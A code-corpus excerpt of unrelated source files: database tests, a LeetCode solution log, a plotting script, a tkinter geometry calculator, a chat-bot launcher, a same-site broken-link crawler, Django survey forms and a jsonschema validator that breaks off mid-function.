    db._get_run(uid, project, 0)  # See issue 140
def test_artifacts_latest(db: sqldb.SQLDB):
    """The 'latest' tag always resolves to the newest artifact per key."""
    project = 'p38'
    db.store_artifact('k1', {'a': 1}, 'u1', project=project)
    found = db.list_artifacts(project=project, tag='latest')
    assert found[0]['a'] == 1, 'bad artifact'

    # Overwriting the same key moves 'latest' without duplicating it.
    db.store_artifact('k1', {'a': 17}, 'u2', project=project)
    found = db.list_artifacts(project=project, tag='latest')
    assert len(found) == 1, 'count'
    assert found[0]['a'] == 17, 'bad artifact'

    # A second key contributes its own 'latest' entry.
    db.store_artifact('k2', {'a': 99}, 'u3', project=project)
    found = db.list_artifacts(project=project, tag='latest')
    assert len(found) == 2, 'number'
    assert {art['a'] for art in found} == {17, 99}, 'latest'
@pytest.mark.parametrize('cls', sqldb._tagged)
def test_tags(db: sqldb.SQLDB, cls):
    """Tagging, lookup, and untagging of every taggable class."""
    project, tag = 'prj1', 'name1'
    first, second, third = cls(), cls(), cls()
    for obj in (first, second, third):
        db.session.add(obj)
    db.session.commit()

    db.tag_objects([first, second], project, tag)
    assert set(db.find_tagged(project, tag)) == {first, second}, 'find tags'

    db.del_tag(project, tag)
    assert db.find_tagged(project, tag) == [], 'find tags after del'
def tag_objs(db, count, project, tags):
    """Create *count* objects cycling over the taggable classes and tag them
    round-robin over *tags* within *project*."""
    grouped = defaultdict(list)
    for i in range(count):
        obj = sqldb._tagged[i % len(sqldb._tagged)]()
        grouped[tags[i % len(tags)]].append(obj)
        db.session.add(obj)
    db.session.commit()
    for tag, objs in grouped.items():
        db.tag_objects(objs, project, tag)
def test_list_tags(db: sqldb.SQLDB):
    """list_tags reports only the tags of the requested project."""
    tag_objs(db, 17, 'prj1', ['a', 'b', 'c'])
    tag_objs(db, 11, 'prj2', ['b', 'c', 'd', 'e'])
    assert set(db.list_tags('prj1')) == {'a', 'b', 'c'}, 'tags'
def test_projects(db: sqldb.SQLDB):
    """Round-trip add/get/update/list of projects."""
    spec = {
        'name': 'p1',
        'description': 'banana',
        # 'users': ['u1', 'u2'],
        'spec': {'company': 'ACME'},
        'state': 'active',
        'created': datetime.now(),
    }
    project_id = db.add_project(spec)
    stored = db.get_project(project_id=project_id)
    assert stored, f'project {project_id} not found'
    roundtrip = {
        'name': stored.name,
        'description': stored.description,
        # 'users': sorted(u.name for u in stored.users),
        'spec': stored.spec,
        'state': stored.state,
        'created': stored.created,
    }
    assert roundtrip == spec, 'bad project'

    db.update_project(stored.name, {'description': 'lemon'})
    stored = db.get_project(project_id=project_id)
    assert stored.description == 'lemon', 'bad update'

    db.add_project({'name': 'p2'})
    assert {p.name for p in db.list_projects()} == {'p1', 'p2'}, 'list'
def test_cache_projects(db: sqldb.SQLDB):
    """_create_project_if_not_exists consults the in-memory project cache."""
    assert len(db._projects) == 0, 'empty cache'
    name = 'prj348'
    db.add_project({'name': name})
    assert db._projects == {name}, 'project'

    # Known name: add_project must not be called again.
    spy = Mock()
    with patch(db, add_project=spy):
        db._create_project_if_not_exists(name)
    spy.assert_not_called()

    # Unknown name: add_project is invoked exactly once.
    spy = Mock()
    with patch(db, add_project=spy):
        db._create_project_if_not_exists(name + '-new')
    spy.assert_called_once()
# def test_function_latest(db: sqldb.SQLDB):
# fn1, t1 = {'x': 1}, 'u83'
# fn2, t2 = {'x': 2}, 'u23'
# prj, name = 'p388', 'n3023'
# db.store_function(fn1, name, prj, t1)
# db.store_function(fn2, name, prj, t2)
#
# fn = db.get_function(name, prj, 'latest')
# assert fn2 == fn, 'latest'
|
983,766 | a608fa029be0291dec487277e45506cf007b7e01 | In leetcode init
[TRACE] inited plugin: cookie.chrome
[TRACE] skipped plugin: lintcode
[TRACE] skipped plugin: leetcode.cn
[TRACE] inited plugin: retry
[TRACE] inited plugin: cache
[TRACE] inited plugin: company
[TRACE] inited plugin: solution.discuss
[DEBUG] cache hit: problems.json
[DEBUG] cache hit: 1063.number-of-valid-subarrays.algorithms.json
C++ O(n) stack
https://leetcode.com/problems/number-of-valid-subarrays/discuss/314317
* Lang: python
* Author: votrubac
* Votes: 2
# Intuition
If element ```i``` is the smallest one we encountered so far, it does not form any valid subarrays with any of the previous elements. Otherwise, it forms a valid subarray starting from each previous element that is smaller.
For this example ```[2, 4, 6, 8, 5, 3, 1]```:
- ```8```: forms 4 valid subarrays (starting from 2, 4, 6, and 8)
- ```5``` forms 3 valid subarrays (2, 4, and 5)
- ```3``` forms 2 valid subarrays (2 and 3)
- ```1``` forms 1 valid subarray (1)
# Solution
Maintain monotonically increased values in a stack. The size of the stack is the number of valid subarrays between the first and last element in the stack.
```
int validSubarrays(vector<int>& nums, int res = 0) {
vector<int> s;
for (auto n : nums) {
while (!s.empty() && n < s.back()) s.pop_back();
s.push_back(n);
res += s.size();
}
return res;
}
```
# Complexity Analysis
Runtime: *O(n)*. We process each element no more than twice.
Memory: *O(n)*.
|
983,767 | 3f1f74ea97f3d2641437be69fcb6ecc2ea718ff6 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import json
import pickle
import os
import matplotlib
matplotlib.rc('pdf', fonttype=42)
path = 'C:/Users/Adm/Desktop/AutoEncoderVideo/Resultados/DB_Experiment1/'
subfolder = [name for name in os.listdir(path) if os.path.isdir(os.path.join(path, name))]
pathmetric = [path + name + '/' for name in subfolder]
plt.rcParams.update({'font.size': 14})
# For each metric folder: read test_1.csv..test_10.csv, collect
# (DAE prediction, MOS) pairs for the frame-freezing HRCs, and save one
# scatter PDF per codec (H.264 / H.265).
for folder in pathmetric:
    try:
        foldername = folder.split("/")[6]  # metric-name component of the path
        # Points keyed by HRC condition, split by codec.
        h264 = {'HRC10': [], 'HRC9': [], 'HRC7': []}
        h265 = {'ANC2': [], 'HRC8': [], 'HRC6': []}
        for i in range(1, 11):
            namefile = folder + 'test_' + str(i) + '.csv'
            scores = pd.read_csv(namefile, sep=';')
            for row_label, _row in scores.iterrows():
                if scores.loc[row_label, 'videoDegradationType'] != 'frameFreezing':
                    continue
                hrc = scores.loc[row_label, 'HRC']
                point = (scores.loc[row_label, 'DAE_Video_cfv10_net'],
                         scores.loc[row_label, 'Mqs'])
                # Dispatch by membership instead of the previous 6-way elif chain.
                if hrc in h264:
                    h264[hrc].append(point)
                elif hrc in h265:
                    h265[hrc].append(point)

        # --- H.265 scatter ---
        fig, ax = plt.subplots(figsize=(8, 8))
        ax.set_ylim([0, 5])
        ax.set_xlim([0, 5])
        ax.set_xlabel('Prediction')
        ax.set_ylabel('MOS')
        ax.grid(True)
        ax.scatter(*zip(*h265['ANC2']))
        ax.scatter(*zip(*h265['HRC8']))
        ax.scatter(*zip(*h265['HRC6']))
        ax.legend(['H.265 ANC2 BR=32000kb/s, N=0, P=0, L=0','H.265 HRC8 BR=1000kb/s, N=2, P=2-3, L=2-2','H.265 HRC6 BR=200kb/s, N=3, P=1-2-3, L=3-3-2',], loc='lower left')
        plt.savefig(folder + foldername + '_h265_Freezing.pdf')
        plt.close(fig)  # fix: figures were never closed, leaking one per folder

        # --- H.264 scatter ---
        fig, ax = plt.subplots(figsize=(8, 8))
        ax.set_ylim([0, 5])
        ax.set_xlim([0, 5])
        ax.set_xlabel('Prediction')
        ax.set_ylabel('MOS')
        ax.grid(True)
        ax.scatter(*zip(*h264['HRC10']))
        ax.scatter(*zip(*h264['HRC9']))
        ax.scatter(*zip(*h264['HRC7']))
        ax.legend(['H.264 HRC10 BR=200kb/s, N=1, P=1, L=2','H.264 HRC9 BR=2000kb/s, N=2, P=1-3, L=1-3','H.264 HRC7 BR=800kb/s, N=3, P=1-2-3, L=2-2-3'], loc='lower left')
        plt.savefig(folder + foldername + '_h264_Freezing.pdf')
        plt.close(fig)
    except Exception:
        # Deliberate best effort per folder (missing CSVs, empty HRC series).
        # Narrowed from the original bare `except:` so KeyboardInterrupt and
        # SystemExit are no longer swallowed.
        pass
|
983,768 | 86514a537ae3112aea057b7e6f3cc883924de049 | import tkinter
import math
##### 'CALCULATE' BUTTON #####
def calc_button_clicked():
    """Recompute sides/perimeter/area from the selected input, redraw the grid
    and the scaled rectangle, and label its corner coordinates.

    NOTE(review): if `selection` ever held a value outside 1..3,
    `peri_float_1/2` would be unbound below — the three radio buttons make
    that unreachable in practice.
    """
    # Value for the radio button selection
    choice = selection.get()
    # Regardless of radio selection, convert the input to perimeter side 1 for all calculations
    # Use a string version of perimeter for text displays. Use a float version for calculations
    # If Sides radio button selected:
    if choice == 1:
        peri_float_1 = abs(float(side_input_1.get().replace(',', '')))
        peri_float_2 = abs(float(side_input_2.get().replace(',', '')))
    # If Perimeter radio button is selected:
    elif choice == 2:
        peri_float_1 = abs(float(perimeter_input.get().replace(',', ''))) / 4
        peri_float_2 = peri_float_1
    # If Area radio button selected:
    elif choice == 3:
        peri_float_1 = math.sqrt(abs(float(area_input.get().replace(',', ''))))
        peri_float_2 = peri_float_1
    # String calculations for all parameters. Use perimeter to calculate all values. Set decimal precision
    # to whatever user specifies in input
    precision = decimal_input.get()
    side_input_1.delete(0, 'end')
    side_input_1.insert(0, f'{peri_float_1:,.{precision}f}')
    side_input_2.delete(0, 'end')
    side_input_2.insert(0, f'{peri_float_2:,.{precision}f}')
    perimeter_input.delete(0, 'end')
    perimeter_input.insert(0, f'{2 * (peri_float_1 + peri_float_2):,.{precision}f}')
    area_input.delete(0, 'end')
    area_input.insert(0, f'{peri_float_1 * peri_float_2:,.{precision}f}')
    # Clear the canvas. This will allow for any previous shapes to be removed.
    # Then redraw the axes and origin coordinates
    canvas.delete('all')
    draw_axes()
    # Set the perimeter strings to match the float equivalents with decimal precision
    peri_str_1 = f'{peri_float_1:,.{precision}f}'
    peri_str_2 = f'{peri_float_2:,.{precision}f}'
    ##### SCALING #####
    # Scale the drawn rectangle so both sides land in [200, 600] pixels;
    # the grid labels (draw_coords) compensate for the scale factor.
    # Only perform scaling if both sides are not 0
    if peri_float_1 != 0 and peri_float_2 != 0:
        # If both sides are equal
        if peri_float_1 == peri_float_2:
            # If side 1 is < 200 or > 600, scale accordingly
            if peri_float_1 < 200:
                draw_coords(peri_float_1 / 2)
                peri_float_1 = 200
                peri_float_2 = 200
            elif peri_float_1 > 600:
                draw_coords(peri_float_1 / 2)
                peri_float_1 = 600
                peri_float_2 = 600
            else:
                draw_coords()
        # If both sides are not equal
        else:
            # Create boolean so that the correct side is scaled. This is because, in some cases, a side will be
            # less than 200 but the other side will be more than 600, meaning both scales would be applicable.
            # In this case, only one (the latter vertical side) will scale.
            scale_horizontal = False
            scale_vertical = False
            # If side 1 is < side 2
            if peri_float_1 < peri_float_2:
                # If side 1 is < 200, enable horizontal scaling
                if peri_float_1 < 200:
                    original_x = peri_float_1
                    original_y = peri_float_2
                    ratio = peri_float_2 / peri_float_1
                    peri_float_1 = 200
                    peri_float_2 = 200 * ratio
                    scale_horizontal = True
                # If side 2 is > 600, enable vertical scaling.
                # Disable horizontal scaling, if any
                if peri_float_2 > 600:
                    # Only scale the original_y value if horizontal scaling has not
                    # been activated
                    # NOTE(review): when horizontal scaling fired first,
                    # original_y keeps the pre-rescale value captured above —
                    # confirm that is the intended label basis.
                    if not scale_horizontal:
                        original_y = peri_float_2
                    ratio = peri_float_2 / 600
                    peri_float_2 = 600
                    peri_float_1 /= ratio
                    scale_horizontal = False
                    scale_vertical = True
            # Else, if side 2 is > side 1
            elif peri_float_2 < peri_float_1:
                # If side 2 is > 600, enable vertical scaling
                if peri_float_2 < 200:
                    original_x = peri_float_1
                    original_y = peri_float_2
                    ratio = peri_float_1 / peri_float_2
                    peri_float_2 = 200
                    peri_float_1 = 200 * ratio
                    scale_vertical = True
                # If side 1 is < 200, enable horizontal scaling
                # Disable vertical scaling, if any
                if peri_float_1 > 600:
                    # Only scale the original_x value if vertical scaling has not
                    # been activated
                    if not scale_vertical:
                        original_x = peri_float_1
                    ratio = peri_float_1 / 600
                    peri_float_1 = 600
                    peri_float_2 /= ratio
                    scale_horizontal = True
                    scale_vertical = False
            # If either scaling is enabled (and only one can be enabled), draw rectangle and scale
            # accordingly. Else, draw rectangle with default scale (meaning both sides are: 200 <= x <= 600)
            if scale_horizontal:
                draw_coords(original_x / 2)
            elif scale_vertical:
                draw_coords(original_y / 2)
            else:
                draw_coords()
    # Draw the rectangle using perimeters. Perimeters must not be 0.
    # Send rectangle to lowest layer of canvas so axes are visible over it
    if peri_float_1 != 0 and peri_float_2 != 0:
        rect = canvas.create_rectangle(canvas_width / 2 - peri_float_1 / 2, canvas_height / 2 - peri_float_2 / 2, \
            canvas_width / 2 + peri_float_1 / 2, canvas_height / 2 + peri_float_2 / 2, \
            fill = 'lime green', outline = 'black')
        canvas.tag_lower(rect)
    # Draw the text for the x/y coordinates of perimeter tuples (starting bottom-right, running counter-clockwise)
    # Remove the commas in order for numbers to be accepted as floats, then re-add commas in strings for readability
    # Set precision based on user's precision input
    canvas.create_text(canvas_width / 2 + peri_float_1 / 2 + 5, canvas_height / 2 + peri_float_2 / 2 + 10, anchor = tkinter.NW, \
        text = '(' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', -' \
        + ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision))+ ')', fill = 'gray')
    canvas.create_text(canvas_width / 2 + peri_float_1 / 2 + 5, canvas_height / 2 - peri_float_2 / 2 - 10, anchor = tkinter.SW, \
        text = '(' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', ' \
        + ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision)) + ')', fill = 'gray')
    canvas.create_text(canvas_width / 2 - peri_float_1 / 2 - 5, canvas_height / 2 - peri_float_2 / 2 - 10, anchor = tkinter.SE, \
        text = '(-' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', ' \
        + ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision)) + ')', fill = 'gray')
    canvas.create_text(canvas_width / 2 - peri_float_1 / 2 - 5, canvas_height / 2 + peri_float_2 / 2 + 10, anchor = tkinter.NE, \
        text = '(-' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', -' \
        + ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision)) + ')', fill = 'gray')
    canvas.pack()
##### 'CLEAR' BUTTON #####
def clear_button_clicked():
# Clear all values. Re-draw axes and coordinates
canvas.delete('all')
selection.set(1)
side_input_1.delete(0, 'end')
side_input_1.insert(0, '0')
side_input_2.delete(0, 'end')
side_input_2.insert(0, '0')
perimeter_input.delete(0, 'end')
perimeter_input.insert(0, '0')
area_input.delete(0, 'end')
area_input.insert(0, '0')
decimal_input.delete(0, 'end')
decimal_input.insert(0, '2')
draw_axes()
draw_coords(100)
##### DRAW AXES, ORIGIN COORDINATES, GRIDLINE MARKERS #####
def draw_axes():
# Draw axes and origin coordinates
canvas.create_line(0, canvas_height / 2, canvas_width, canvas_height / 2, width = 1, fill='black')
canvas.create_line(canvas_width / 2, 0, canvas_width / 2, canvas_height, width = 1, fill='black')
canvas.create_text(canvas_width / 2 + 5, canvas_height / 2 + 10, anchor = tkinter.W, text = '(0, 0)')
# Draw gridline markers
x_gridlines = canvas_width / 8
y_gridlines = canvas_height / 8
for num in range(7):
canvas.create_line(x_gridlines, canvas_height / 2 - 10, \
x_gridlines, canvas_height / 2 + 10, fill = 'black')
canvas.create_line(canvas_width / 2 - 10, y_gridlines, \
canvas_width / 2 + 10, y_gridlines, fill = 'black')
x_gridlines += canvas_width / 8
y_gridlines += canvas_height / 8
##### DRAW GRID COORDINATES #####
def draw_coords(length = 100):
# If (side / 2) is <= 100, rightmost coordinate will be 3 * (side / 2). Otherwise, coordinate will be
# the current set side / 2. This will allow coordinates to adapt to side size
if length <= 100:
grid_val = length * 3
else:
grid_val = length
# x/y coordinates will be set to increments that 1/8 the size of the canvas
grid_x_position = canvas_width - canvas_width / 8
grid_y_position = 0 + canvas_height / 8
# Set precision to current decimal input
precision = decimal_input.get()
# Run loop 7 times (skipping the middle coordinate), drawing the coordinates on screen. Then increment
# the grid values accordingly
for num in range(7):
if num != 3:
canvas.create_text(grid_x_position, canvas_height / 2 + 20, text = f'{grid_val:,.{precision}f}')
canvas.create_text(canvas_width / 2 + 30, grid_y_position, text = f'{grid_val:,.{precision}f}')
grid_x_position -= canvas_width / 8
grid_y_position += canvas_height / 8
if length <= 100:
grid_val -= length
else:
grid_val -= length / 3
##### MAIN FUNCTION #####
# Create main window. Set to full screen. Place window on top
window = tkinter.Toplevel()
window.geometry('%dx%d' % (window.winfo_screenwidth(), window.winfo_screenheight()))
# Set canvas width/height constants
canvas_width = 800
canvas_height = 800
# Create top frame & canvas, and bottom frame & button canvas
top_frame = tkinter.Frame(window, width = canvas_width, height = 1000)
top_frame.pack(side = 'top', pady = 10)
canvas = tkinter.Canvas(top_frame, width = canvas_width, height = canvas_height, bg = 'white', \
highlightbackground = 'black', highlightthickness = 1)
canvas.pack()
bottom_frame = tkinter.Frame(window, width = canvas_width, height = 100)
bottom_frame.pack(side = 'top', pady = 10)
bottom_frame.pack_propagate(0)
button_canvas = tkinter.Canvas(bottom_frame, width = canvas_width, height = 100, bg = 'lavender', \
highlightbackground = 'black', highlightthickness = 1)
button_canvas.pack()
# Draw default axes and default coordinates
draw_axes()
##### RADIO BUTTONS #####
selection = tkinter.IntVar()
selection.set(1)
selection_sides = tkinter.Radiobutton(bottom_frame, text = 'Sides', variable = selection, value = 1, bg = 'lavender')
selection_perimeter = tkinter.Radiobutton(bottom_frame, text = 'Perimeter', variable = selection, value = 2, bg = 'lavender')
selection_area = tkinter.Radiobutton(bottom_frame, text = 'Area', variable = selection, value = 3, bg = 'lavender')
selection_sides.place(x = 200, y = 15)
selection_perimeter.place(x = 200, y = 45)
selection_area.place(x = 200, y = 65)
##### USER INPUT AND BUTTONS #####
side_input_1 = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
side_input_2 = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
perimeter_input = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
area_input = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
# Insert a 0 in the user_input box. This will prevent error if user clicks 'Calculate' with a null value
side_input_1.insert(0, '0')
side_input_2.insert(0, '0')
perimeter_input.insert(0, '0')
area_input.insert(0, '0')
side_label_1 = tkinter.Label(bottom_frame, text = 'x: ', bg = 'lavender')
side_label_2 = tkinter.Label(bottom_frame, text = 'y: ', bg = 'lavender')
side_label_1.place(x = canvas_width / 2 - 70, y = 10)
side_label_2.place(x = canvas_width / 2 - 70, y = 30)
side_input_1.place(x = canvas_width / 2 - 50, y = 10)
side_input_2.place(x = canvas_width / 2 - 50, y = 30)
perimeter_input.place(x = canvas_width / 2 - 50, y = 50)
area_input.place(x = canvas_width / 2 - 50, y = 70)
# 'Calculate' button
calc_button = tkinter.Button(bottom_frame, text = 'Calculate', command = calc_button_clicked, height = 3, width = 8)
calc_button.place(x = canvas_width / 2 + 75, y = 20)
# 'Clear all' button
clear_button = tkinter.Button(bottom_frame, text = 'Clear all', command = clear_button_clicked, height = 3, width = 8)
clear_button.place(x = canvas_width / 2 + 150, y = 20)
# 'Back' button
back_button = tkinter.Button(bottom_frame, text = 'Back', command = lambda : window.destroy(), height = 3, width = 8)
back_button.place(x = 10, y = 20)
# Decimal precision input
decimal_label = tkinter.Label(bottom_frame, text = 'Dec. precision: ', bg = 'lavender')
decimal_label.place(x = canvas_width - 150, y = 10)
decimal_input = tkinter.Entry(bottom_frame, width = 5, justify = 'right')
decimal_input.insert(0, '2')
decimal_input.place(x = canvas_width - 50, y = 10)
# Draw default axes and default coordinates
draw_axes()
draw_coords(100)
# Run tkinter main loop
tkinter.mainloop()
|
983,769 | 2ca61fde1abb6d11ee759486d2a2d59ec6c00a12 | #!/usr/bin/python3
# vim: ts=4 expandtab
from __future__ import annotations
from storage import FileStore
from bot import DiscordBot, TwitchBot
def main():
    """Entry point: run the Discord bot against the shared file-backed store."""
    with FileStore("list.txt") as backing_store:
        discord_bot(backing_store)
    print("All bots shutdown")
def twich_bot(storage: FileStore) -> None:
    """Run the Twitch bot for the sugarsh0t channel (blocks until shutdown).

    NOTE(review): the name is misspelled ('twich') and main() never calls
    this function — confirm whether the Twitch bot is intentionally disabled.
    """
    # Token file format: "<oauth token>:<client id>" on a single line.
    with open("twitch.token", "r") as token_handle:
        [token, client_id] = token_handle.read().strip().split(":", 1)
    instance = TwitchBot(token, int(client_id), "eorzeas_only_hope", storage)
    instance.join("sugarsh0t")
    instance.run()
def discord_bot(storage: FileStore) -> None:
    """Read the Discord token from disk and run the Discord bot until exit."""
    with open("discord.token", "r") as token_handle:
        token = token_handle.read().strip()
    # An empty token file would otherwise fail deep inside the client.
    if not token:
        raise Exception("Unable to load token from token file")
    DiscordBot(storage).run(token)
# Start the bots only when executed as a script, not on import.
if __name__ == "__main__":
    main()
|
983,770 | c2e8ccc1bc9908968fa1c69f050b3577c18f7a35 | import asyncio
import re
from typing import Iterator
from urllib.parse import ParseResult, urlparse
import aiohttp
from bs4 import BeautifulSoup
from yarl import URL
from reporter import Reporter
class Crawler:
    """
    A web crawler that checks the HTTP status of all links on a website and
    its sub-pages.

    The crawler uses the Breadth First Search algorithm to crawl a given
    website and all its subsidiaries. Websites that are out of scope (don't
    have the same network location as the given website) are ignored.

    Inspiration: https://github.com/aosabook/500lines/blob/master/crawler
    /code/crawling.py
    """

    # Number of concurrent worker tasks pulling URLs from the queue.
    MAX_WORKERS = 10

    def __init__(self, root: str):
        """Prepare a crawl starting from *root* (an absolute URL)."""
        # asyncio stuff
        self.loop = asyncio.get_event_loop()
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.workers = []
        self.visited = set([root])
        # FIX: the `loop` keyword argument of asyncio.Queue was deprecated in
        # 3.8 and removed in 3.10; the queue binds to the running loop itself.
        self.q = asyncio.Queue()
        self.q.put_nowait((root, root))
        # Scope marker: the root's network location, without a "www." prefix.
        self.netloc = urlparse(root).netloc.replace('www.', '')
        self.scanned = 0

    def start(self):
        """Starts the crawling. Cleans up after crawler is interrupted."""
        loop = asyncio.get_event_loop()
        try:
            loop.run_until_complete(self._setup())
        except KeyboardInterrupt:
            Reporter.info('Crawler stopping...')
        finally:
            loop.run_until_complete(self._close())
            # Next 2 lines are needed for aiohttp resource cleanup
            loop.stop()
            loop.run_forever()
            loop.close()

    async def _setup(self):
        """Starts the async workers. Runs until the task queue is empty."""
        Reporter.info('Setting up workers...')
        # FIX: asyncio.Task(coro, loop=...) is deprecated/removed; create the
        # tasks on the loop directly instead.
        self.workers = [self.loop.create_task(self._work())
                        for _ in range(self.MAX_WORKERS)]
        Reporter.info('Starting scan...')
        await self.q.join()

    async def _work(self):
        """Pulls URLs from the task queue and scans them."""
        try:
            while True:
                url, parent = await self.q.get()
                await self._scan(url, parent)
                self.q.task_done()
                self.scanned += 1
                Reporter.status(self.scanned, self.q.qsize())
        except asyncio.CancelledError:
            Reporter.info('Worker stopped!')

    async def _scan(self, url: str, parent: str):
        """
        Fetches a URL HTML text and adds all links in the text to the
        task queue. If URL is not available, reports it.
        """
        Reporter.scan(parent, url)
        try:
            res = await self.session.get(url)
        except aiohttp.ClientError as e:
            Reporter.error(parent, url, e)
            return
        if res.status >= 400:
            Reporter.broken(parent, url, res.status)
            return
        for link in await self._find_links(res):
            if link not in self.visited:
                self.visited.add(link)
                self.q.put_nowait((link, url))

    async def _find_links(self, res: aiohttp.ClientResponse) -> Iterator[str]:
        """Finds all 'a' tags on the page. Parses and returns them."""
        content = await res.text()
        soup = BeautifulSoup(content, 'html.parser')
        links = [self._format(res.url, a) for a in soup.find_all('a')]
        return filter(lambda l: l is not None, links)

    def _format(self, parent: URL, tag):
        """
        Retrieves, formats, and returns URLs from an 'a' tag.
        Returns None, if no URL was found or if URL does is not valid.
        """
        url = tag.get('href', None)
        if url is None:
            return None
        parsed = urlparse(url)
        if parsed.netloc == '':
            # Relative link: inherit scheme and host from the parent page.
            parsed = parsed._replace(scheme=parent.scheme)
            parsed = parsed._replace(netloc=parent.host)
        return parsed.geturl() if self._is_valid(parsed) else None

    def _is_valid(self, url: ParseResult):
        """Checks if a URL complies with a given set of validators.

        A URL is in scope when its netloc equals, or is a subdomain of, the
        root's netloc; phone-number-like paths and javascript: pseudo-links
        are rejected.
        """
        # BUG FIX: the original pattern '(.*).' + netloc used re.match with an
        # unescaped dot and no end anchor, so 'example.com.evil.org' matched
        # while the bare root 'example.com' (without www.) did not.
        if re.fullmatch(r'(.*\.)?' + re.escape(self.netloc), url.netloc) is None:
            return False
        if re.match(r'(.*)\+[0-9]*$', url.path) is not None:
            return False
        if re.match(r'(.*)javascript:(.*)', url.path) is not None:
            return False
        return True

    async def _close(self):
        """Cancels all workers. Closes aiohttp session."""
        for w in self.workers:
            w.cancel()
        await self.session.close()
|
983,771 | 9ef103019bd2cb0d409e206a8ae6c5692138d3a3 | from django import forms
class form_UserProfile(forms.Form):
    """Demographics / health-background questionnaire fields for a user."""
    gender = forms.CharField(label='gender')
    age_range = forms.CharField(label='age_range')
    marriage = forms.CharField(label='marriage')
    education = forms.CharField(label='education')
    live_with = forms.CharField(label='live_with')
    live_with_detail = forms.CharField(label='live_with_detail')
    guardian = forms.CharField(label='guardian')
    occupation = forms.CharField(label='occupation')
    income_avg = forms.CharField(label='income_avg')
    # Chronic disease fields: flag, free-text detail, and duration.
    chronic_dis = forms.CharField(label='chronic_dis')
    chronic_dis_detail = forms.CharField(label='chronic_dis_detail')
    chronic_dis_time = forms.CharField(label='chronic_dis_time')
    medi_number = forms.CharField(label='medi_number')
    medi_detail = forms.CharField(label='medi_detail')
    hyperventi_medi = forms.CharField(label='hyperventi_medi')
    hyperventi_detail = forms.CharField(label='hyperventi_detail')
    fall_his = forms.CharField(label='fall_his')
class form_AnswerSheetAB(forms.Form):
    """Answer sheet for question groups A and B (six items each)."""
    user_id = forms.IntegerField(label='id')
    qa1 = forms.IntegerField(label='qa1')
    qa2 = forms.IntegerField(label='qa2')
    qa3 = forms.IntegerField(label='qa3')
    qa4 = forms.IntegerField(label='qa4')
    qa5 = forms.IntegerField(label='qa5')
    qa6 = forms.IntegerField(label='qa6')
    qb1 = forms.IntegerField(label='qb1')
    qb2 = forms.IntegerField(label='qb2')
    qb3 = forms.IntegerField(label='qb3')
    qb4 = forms.IntegerField(label='qb4')
    qb5 = forms.IntegerField(label='qb5')
    qb6 = forms.IntegerField(label='qb6')
class form_AnswerSheetC(forms.Form):
    """Answer sheet for question group C (six items)."""
    user_id = forms.IntegerField(label='id')
    qc1 = forms.IntegerField(label='qc1')
    qc2 = forms.IntegerField(label='qc2')
    qc3 = forms.IntegerField(label='qc3')
    qc4 = forms.IntegerField(label='qc4')
    qc5 = forms.IntegerField(label='qc5')
    qc6 = forms.IntegerField(label='qc6')
class form_intermediate(forms.Form):
    """Minimal form carrying only the user id between questionnaire pages."""
    user_id = forms.IntegerField(label='id')
class form_AnswerSheetD(forms.Form):
    """Answer sheet for question group D (five items)."""
    user_id = forms.IntegerField(label='id')
    qd1 = forms.IntegerField(label='qd1')
    qd2 = forms.IntegerField(label='qd2')
    qd3 = forms.IntegerField(label='qd3')
    qd4 = forms.IntegerField(label='qd4')
    qd5 = forms.IntegerField(label='qd5')
class form_AnswerSheetE(forms.Form):
    """Answer sheet for question group E (five items)."""
    user_id = forms.IntegerField(label='id')
    qe1 = forms.IntegerField(label='qe1')
    qe2 = forms.IntegerField(label='qe2')
    qe3 = forms.IntegerField(label='qe3')
    qe4 = forms.IntegerField(label='qe4')
    qe5 = forms.IntegerField(label='qe5')
class form_risk(forms.Form):
    """Fall-risk assessment answers (eyesight, balance, medication, history)."""
    user_id = forms.IntegerField(label='id')
    eye_sight = forms.CharField(label = 'eye_sight')
    balancing = forms.CharField(label='balancing')
    medication = forms.CharField(label='medication')
    falling_in_6_months = forms.CharField(label ='falling')
    home = forms.CharField(label='home')
|
983,772 | 5b5f48747863869418144b0716c60f6fe27a0428 | import logging
import json
import pathlib
import os
from jsonschema import Draft7Validator, validators, RefResolver
from jsonschema.exceptions import ValidationError
LOGGER = logging.getLogger(__name__)
RESOLVER = None
def extend_with_defaults(validator_class):
    """Extends the validator class to set defaults automatically.

    Returns a new validator class whose "properties" handler first injects
    every `default` declared in the schema into the instance, then delegates
    to the original "properties" validator.
    """
    validate_properties = validator_class.VALIDATORS["properties"]

    def set_defaults(validator, properties, instance, schema):
        # `prop`, not `property`: the original shadowed the builtin.
        for prop, subschema in properties.items():
            if "default" in subschema:
                instance.setdefault(prop, subschema["default"])
        # Delegate real validation to the stock handler.
        yield from validate_properties(
            validator,
            properties,
            instance,
            schema,
        )

    return validators.extend(
        validator_class,
        {"properties": set_defaults},
    )


# Draft 7 validator that also fills in schema defaults while validating.
Validator = extend_with_defaults(Draft7Validator)
def resolver():
    """Load the schema and returns a resolver.

    The resolver is memoized in the module-level RESOLVER global, so the
    schema file is read at most once per process.
    """
    global RESOLVER  # replaces the original globals()["RESOLVER"] = ... hack
    if RESOLVER:
        return RESOLVER
    path = str(pathlib.Path(__file__).parents[1].joinpath("schema", "app.json"))
    with open(path) as stream:
        schema = json.load(stream)
    RESOLVER = RefResolver(
        "https://schema.timeflux.io/app.json", None
    ).from_schema(schema)
    return RESOLVER
def validate(instance, definition="app"):
    """Validate a Timeflux application or a graph.

    Args:
        instance (dict): The application to validate.
        definition (string): The subschema to validate against.

    Raises:
        ValueError: if validation fails; each error is logged first.
    """
    validator = Validator({"$ref": "#/definitions/" + definition},
                          resolver=resolver())
    errors = sorted(validator.iter_errors(instance), key=lambda err: err.path)
    if not errors:
